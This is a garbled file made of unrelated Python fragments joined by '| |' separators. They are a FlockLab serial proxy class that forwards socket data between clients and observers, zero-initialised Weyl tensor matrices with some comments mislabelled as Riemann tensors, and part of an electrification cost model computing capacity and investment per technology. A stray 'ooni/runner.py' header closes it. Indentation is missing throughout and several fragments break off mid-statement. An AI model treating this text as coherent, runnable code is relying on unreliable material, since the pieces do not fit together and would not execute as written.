client_to_obs = {} # dict obs_socket -> server_socket
obs_to_client = {} # dict server_socket -> obs_socket
proxyConfig = []
addlist = []
removelist = []
op = None
def __init__(self):
# multiprocessing events and queues
# for server socket processes
self.stopevent = multiprocessing.Event()
self.reloadevent = multiprocessing.Event()
self.newConnectionQueue = multiprocessing.Queue()
# for observer reconnect process
self.conreqQueue = multiprocessing.Queue()
self.condoneQueue = multiprocessing.Queue()
# start observer reconnect process
self.op = threading.Thread(target = obs_connect_process, args=(self.conreqQueue,self.condoneQueue,self.stopevent,))
self.op.daemon = True
def reloadConfiguration(self, newconfig):
oldconfig = self.proxyConfig
self.proxyConfig = newconfig
# empty observer request queue
self.conreqQueue.put(None)
# drop old connections
for dc in [c for c in oldconfig if c not in newconfig]:
logger.debug("Drop old connection %s" % str(dc))
self.server_socket_process_list[dc[0][1]][1].set() # set stop event
if dc[0] in self.server_socket_list and self.server_socket_list[dc[0]]:
self.removeHandler(self.server_socket_list[dc[0]])
elif dc[1] in self.obs_socket_list and self.obs_socket_list[dc[1]]:
self.removeHandler(self.obs_socket_list[dc[1]])
for dc in [c for c in oldconfig if c not in newconfig]:
self.server_socket_process_list[dc[0][1]][0].join()
del self.server_socket_process_list[dc[0][1]] # remove the entry from the dictionary
# add new connections
for nc in [c for c in newconfig if c not in oldconfig]:
logger.debug("Add new connection %s" % str(nc))
self.requestListenSocket(nc[0])
self.requestObserverSocket(nc[1])
def requestListenSocket(self, addr):
if not addr[1] in self.server_socket_process_list:
_stopevent = multiprocessing.Event()
lp = threading.Thread(target = listen_process, args=(addr[1],self.newConnectionQueue,_stopevent,))
lp.daemon = True
lp.start()
self.server_socket_process_list[addr[1]] = (lp, _stopevent)
def requestObserverSocket(self, addr):
self.conreqQueue.put(addr)
def getLists(self, is_observer):
if is_observer:
return self.obs_socket_list, self.server_socket_list, self.obs_to_client, self.client_to_obs
else:
return self.server_socket_list, self.obs_socket_list, self.client_to_obs, self.obs_to_client
def removeHandler(self, conn):
reconnect = None
conn.shutdown(socket.SHUT_RDWR)
conn.close()
# remove from socket list
for l in (self.obs_socket_list, self.server_socket_list):
for k,s in list(l.items()):
if s == conn:
del(l[k])
reconnectaddr = k
break
# if bidirectional, remove also other socket
if conn in self.client_to_obs: # client connetion. remove
reconnect = False
src_list, dst_list, src_to_dst, dst_to_src = self.getLists(False)
elif conn in self.obs_to_client: # observer connection. try to reconnect with timeout
reconnect = True
src_list, dst_list, src_to_dst, dst_to_src = self.getLists(True)
else:
return
self.removelist.append(conn)
self.removelist.append(src_to_dst[conn])
del(dst_to_src[src_to_dst[conn]])
del(src_to_dst[conn])
if reconnect and reconnectaddr:
connectionConfig = [p for p in self.proxyConfig if p[1] == reconnectaddr]
if len(connectionConfig) > 0:
self.requestObserverSocket(connectionConfig[0][1])
def addHandler(self, conn, addr, is_observer):
if is_observer:
connectionConfig = [p[0] for p in self.proxyConfig if p[1] == addr]
else:
connectionConfig = [p[1] for p in self.proxyConfig if p[0] == addr]
if len(connectionConfig) > 0:
src_list, dst_list, src_to_dst, dst_to_src = self.getLists(is_observer)
connectionConfig = connectionConfig[0]
if addr in src_list:
conn.shutdown(socket.SHUT_RDWR)
conn.close()
logger.info("Connection rejected, already exists")
return
src_list[addr] = conn
#logger.debug("src_list is %s" % str(src_list))
if connectionConfig in dst_list:
src_to_dst[conn] = dst_list[connectionConfig]
dst_to_src[dst_list[connectionConfig]] = conn
# forward on this connection
self.addlist.append(conn)
self.addlist.append(src_to_dst[conn])
logger.info("Established connection %s" % (str((connectionConfig, addr))))
else:
conn.close()
logger.info("Connection request from %s ignored" % addr[0])
def getChanges(self):
a = self.addlist
r = self.removelist
self.addlist = []
self.removelist = []
return a, r
def forward(self, data, src_conn):
if src_conn in self.client_to_obs and self.client_to_obs[src_conn]:
self.client_to_obs[src_conn].send(data)
elif src_conn in self.obs_to_client and self.obs_to_client[src_conn]:
self.obs_to_client[src_conn].send(data)
def run(self):
global stopevent
global reloadevent
stopevent = self.stopevent
reloadevent = self.reloadevent
self.op.start()
logger.info("FlockLab serial proxy started.")
# infinite while loop
inputs = [self.newConnectionQueue._reader, self.condoneQueue._reader]
while not stopevent.is_set():
try:
(readable, writable, ex) = select.select(inputs,[],[],10) # 10s timeout
except select.error as | |
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
]
])
# Declares Weyl curvature tensor "dddd" type class object.
self.weyl_tensor_dddd = Matrix([
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
]
])
# Declares Riemann curvature tensor "uddd" type class object.
self.weyl_tensor_uddd = Matrix([
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
]
])
# Declares Riemann curvature tensor "dduu" type class object.
self.weyl_tensor_dduu = Matrix([
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, | |
mintraveldistance += 0.95
if iteration > 300:
iteration = 0
conflictlimit += 1
mintraveldistance = self.df[SET_TRAVEL_HOURS].min()
if conflictlimit > 0:
elec_loop += 1
else:
still_looking = False
print("The electrification rate achieved is {}".format(elecrate))
### Fast method attempt
# self.df['InvestmentCapita'] = self.df[SET_INVESTMENT_COST + "{}".format(year)] / self.df[SET_POP+"{}".format(year)]
# sorted_investment = self.df[SET_MIN_OVERALL_LCOE + "{}".format(year)].copy()
# sorted_investment.sort_values(inplace=True)
# investment_pop_break = eleclimit * self.df[SET_POP+"{}".format(year)].sum()
# cumulative_pop = 0
# ii = 0
# while cumulative_pop < investment_pop_break:
# cumulative_pop += sorted_investment.iloc[ii]
# ii += 1
# investment_cutoff = sorted_investment.iloc[ii - 1]
#
# self.df.loc[self.df[SET_MIN_OVERALL_LCOE + "{}".format(year)] <= investment_cutoff, SET_LIMIT + "{}".format(year)] = 1
# self.df.loc[self.df[SET_MIN_OVERALL_LCOE + "{}".format(year)] > investment_cutoff, SET_LIMIT + "{}".format(year)] = 0
#
# elecrate = sum(self.df[self.df[SET_LIMIT + "{}".format(year)] == 1][SET_POP + "{}".format(year)]) / \
# self.df[SET_POP + "{}".format(year)].sum()
# print("The electrification rate achieved is {}".format(elecrate))
###
def final_decision(self, mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc,
sa_diesel_calc, grid_calc, year, end_year, timestep):
"""" ... """
logging.info('Determine final electrification decision')
self.df[SET_ELEC_FINAL_GRID + "{}".format(year)] = \
self.df.apply(lambda row: 1
if (row[SET_ELEC_FUTURE_GRID + "{}".format(year)] == 1) or
(row[SET_LIMIT + "{}".format(year)] == 1 and
row[SET_MIN_OVERALL_CODE + "{}".format(year)] == 1 and
row[SET_GRID_REACH_YEAR] <= year)
else 0, axis=1)
self.df[SET_ELEC_FINAL_OFFGRID + "{}".format(year)] = \
self.df.apply(lambda row: 1
if (row[SET_ELEC_FUTURE_OFFGRID + "{}".format(year)] == 1 and
row[SET_MIN_OVERALL_CODE + "{}".format(year)] != 1) or
(row[SET_LIMIT + "{}".format(year)] == 1 and
row[SET_ELEC_FINAL_GRID + "{}".format(year)] == 0) or
(row[SET_LIMIT + "{}".format(year)] == 1 and
row[SET_MIN_OVERALL_CODE + "{}".format(
year)] == 1 and
row[SET_GRID_REACH_YEAR] > year)
else 0, axis=1)
self.df.loc[(self.df[SET_LIMIT + "{}".format(year)] == 1) &
(self.df[SET_ELEC_FINAL_GRID + "{}".format(year)] == 1),
SET_ELEC_FINAL_CODE + "{}".format(year)] = 1
self.df.loc[(self.df[SET_LIMIT + "{}".format(year)] == 1) &
(self.df[SET_ELEC_FINAL_OFFGRID + "{}".format(year)] == 1),
SET_ELEC_FINAL_CODE + "{}".format(year)] = self.df[SET_MIN_OFFGRID_CODE + "{}".format(year)]
self.df.loc[(self.df[SET_LIMIT + "{}".format(year)] == 0) &
(self.df[SET_ELEC_FINAL_GRID + "{}".format(year)] == 0) &
(self.df[SET_ELEC_FINAL_OFFGRID + "{}".format(year)] == 0),
SET_ELEC_FINAL_CODE + "{}".format(year)] = 99
logging.info('Calculate new capacity')
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 1, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * grid_calc.capacity_factor * grid_calc.base_to_peak_load_ratio *
(1 - grid_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 7, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * mg_hydro_calc.capacity_factor * mg_hydro_calc.base_to_peak_load_ratio *
(1 - mg_hydro_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 5, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * (self.df[SET_GHI] / HOURS_PER_YEAR) * mg_pv_calc.base_to_peak_load_ratio *
(1 - mg_pv_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 6, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * self.df[SET_WINDCF] * mg_wind_calc.base_to_peak_load_ratio *
(1 - mg_wind_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 4, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * mg_diesel_calc.capacity_factor * mg_diesel_calc.base_to_peak_load_ratio *
(1 - mg_diesel_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 2, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * sa_diesel_calc.capacity_factor * sa_diesel_calc.base_to_peak_load_ratio *
(1 - sa_diesel_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 3, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * (self.df[SET_GHI] / HOURS_PER_YEAR) * sa_pv_calc.base_to_peak_load_ratio *
(1 - sa_pv_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 99, SET_NEW_CAPACITY + "{}".format(year)] = 0
def res_investment_cost(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 2:
return sa_diesel_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
travel_hours=row[SET_TRAVEL_HOURS],
conf_status=row[SET_CONFLICT],
get_investment_cost=True)
elif min_code == 3:
return sa_pv_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
capacity_factor=row[SET_GHI] / HOURS_PER_YEAR,
conf_status=row[SET_CONFLICT],
get_investment_cost=True)
elif min_code == 6:
return mg_wind_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
capacity_factor=row[SET_WINDCF],
conf_status=row[SET_CONFLICT],
get_investment_cost=True)
elif min_code == 4:
return mg_diesel_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
travel_hours=row[SET_TRAVEL_HOURS],
conf_status=row[SET_CONFLICT],
get_investment_cost=True)
elif min_code == 5:
return mg_pv_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
capacity_factor=row[SET_GHI] / HOURS_PER_YEAR,
conf_status=row[SET_CONFLICT],
get_investment_cost=True)
elif min_code == 7:
return mg_hydro_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
mv_line_length=row[SET_HYDRO_DIST],
get_investment_cost=True)
elif min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost=True)
else:
return 0
logging.info('Calculate investment cost')
self.df[SET_INVESTMENT_COST + "{}".format(year)] = self.df.apply(res_investment_cost, axis=1)
def res_investment_cost_lv(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost_lv=True)
else:
return 0
logging.info('Calculate LV investment cost')
self.df['InvestmentCostLV' + "{}".format(year)] = self.df.apply(res_investment_cost_lv, axis=1)
def res_investment_cost_mv(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost_mv=True)
else:
return 0
logging.info('Calculate MV investment cost')
self.df['InvestmentCostMV' + "{}".format(year)] = self.df.apply(res_investment_cost_mv, axis=1)
def res_investment_cost_hv(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost_hv=True)
else:
return 0
logging.info('Calculate HV investment cost')
self.df['InvestmentCostHV' + "{}".format(year)] = self.df.apply(res_investment_cost_hv, axis=1)
def res_investment_cost_transformer(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost_transformer=True)
else:
return 0
logging.info('Calculate transformer investment cost')
self.df['InvestmentCostTransformer' + "{}".format(year)] = self.df.apply(res_investment_cost_transformer, axis=1)
def res_investment_cost_connection(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost_connection=True)
else:
return 0
logging.info('Calculate connection investment cost')
self.df['InvestmentCostConnection' + "{}".format(year)] = self.df.apply(res_investment_cost_connection, axis=1)
def infrastructure_cost(row):
if row[SET_NEW_CONNECTIONS + "{}".format(year)] > 0 and row[SET_ELEC_FINAL_CODE + "{}".format(year)] == 1:
return (row['InvestmentCostLV' + "{}".format(year)]
+ row['InvestmentCostMV' + "{}".format(year)] + row['InvestmentCostHV' + "{}".format(year)]
+ row['InvestmentCostTransformer' + "{}".format(year)] +
row['InvestmentCostConnection' + "{}".format(year)])/(row[SET_NEW_CONNECTIONS + "{}".format(year)] / row[SET_NUM_PEOPLE_PER_HH])
# return (row[SET_INVESTMENT_COST + "{}".format(year)] + row['InvestmentCostLV' + "{}".format(year)]
# + row['InvestmentCostMV' + "{}".format(year)] + row['InvestmentCostHV' + "{}".format(year)]
# + row['InvestmentCostTransformer' + "{}".format(year)] +
# row['InvestmentCostConnection' + "{}".format(year)]) / row[
# SET_NEW_CONNECTIONS + "{}".format(year)]
else:
return 0
logging.info('Calculating average infrastructure cost for grid connection')
self.df['InfrastructureCapitaCost' + "{}".format(year)] = self.df.apply(infrastructure_cost, axis=1)
# Update the actual electrification column with results
self.df[SET_ELEC_FUTURE_ACTUAL + "{}".format(year)] = self.df[SET_LIMIT + "{}".format(year)]
def delete_redundant_columns(self, year):
self.df['ResultsNoTimestep'] = self.df[SET_ELEC_FINAL_CODE + "{}".format(year)]
del self.df[SET_ELEC_FINAL_CODE + "{}".format(year)]
del self.df[SET_LCOE_MG_HYDRO + "{}".format(year)]
del self.df[SET_LCOE_MG_PV + "{}".format(year)]
del self.df[SET_LCOE_MG_WIND + "{}".format(year)]
del self.df[SET_LCOE_MG_DIESEL + "{}".format(year)]
del self.df[SET_LCOE_SA_DIESEL + "{}".format(year)]
del self.df[SET_LCOE_SA_PV + "{}".format(year)]
del self.df[SET_MIN_OFFGRID + "{}".format(year)]
del self.df[SET_MIN_OFFGRID_LCOE + "{}".format(year)]
del self.df[SET_MIN_OFFGRID_CODE + "{}".format(year)]
del self.df[SET_ELEC_FUTURE_GRID + "{}".format(year)]
del self.df[SET_ELEC_FUTURE_OFFGRID + "{}".format(year)]
del self.df[SET_ELEC_FUTURE_ACTUAL + "{}".format(year)]
del self.df[SET_LCOE_GRID + "{}".format(year)]
del self.df[SET_MIN_GRID_DIST + "{}".format(year)]
del self.df[SET_ELEC_ORDER + "{}".format(year)]
del self.df[SET_MIN_OVERALL + "{}".format(year)]
del self.df[SET_MIN_OVERALL_LCOE + "{}".format(year)]
del self.df[SET_MIN_OVERALL_CODE + "{}".format(year)]
del self.df[SET_LIMIT + "{}".format(year)]
del self.df[SET_ELEC_FINAL_GRID + "{}".format(year)]
del self.df[SET_ELEC_FINAL_OFFGRID + "{}".format(year)]
del self.df[SET_NEW_CAPACITY + "{}".format(year)]
del self.df[SET_INVESTMENT_COST + "{}".format(year)]
del self.df[SET_NEW_CONNECTIONS + "{}".format(year)]
del self.df[SET_ENERGY_PER_CELL + "{}".format(year)]
def calc_summaries(self, df_summary, sumtechs, year):
"""The next section calculates the summaries for technology split,
consumption added and total investment cost"""
logging.info('Calculate summaries')
# Population Summaries
df_summary[year][sumtechs[0]] = sum(self.df.loc[(self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 1) &
(self.df[SET_LIMIT + "{}".format(year)] == 1)]
[SET_POP + "{}".format(year)])
df_summary[year][sumtechs[1]] = sum(self.df.loc[(self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 2) &
(self.df[SET_LIMIT + "{}".format(year)] == 1)]
[SET_POP + "{}".format(year)])
df_summary[year][sumtechs[2]] = sum(self.df.loc[(self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 3) &
(self.df[SET_LIMIT + "{}".format(year)] == 1)]
[SET_POP + "{}".format(year)])
df_summary[year][sumtechs[3]] = sum(self.df.loc[(self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 4) &
(self.df[SET_LIMIT + "{}".format(year)] == 1)]
[SET_POP + "{}".format(year)])
df_summary[year][sumtechs[4]] = | |
<filename>ooni/runner.py
import os
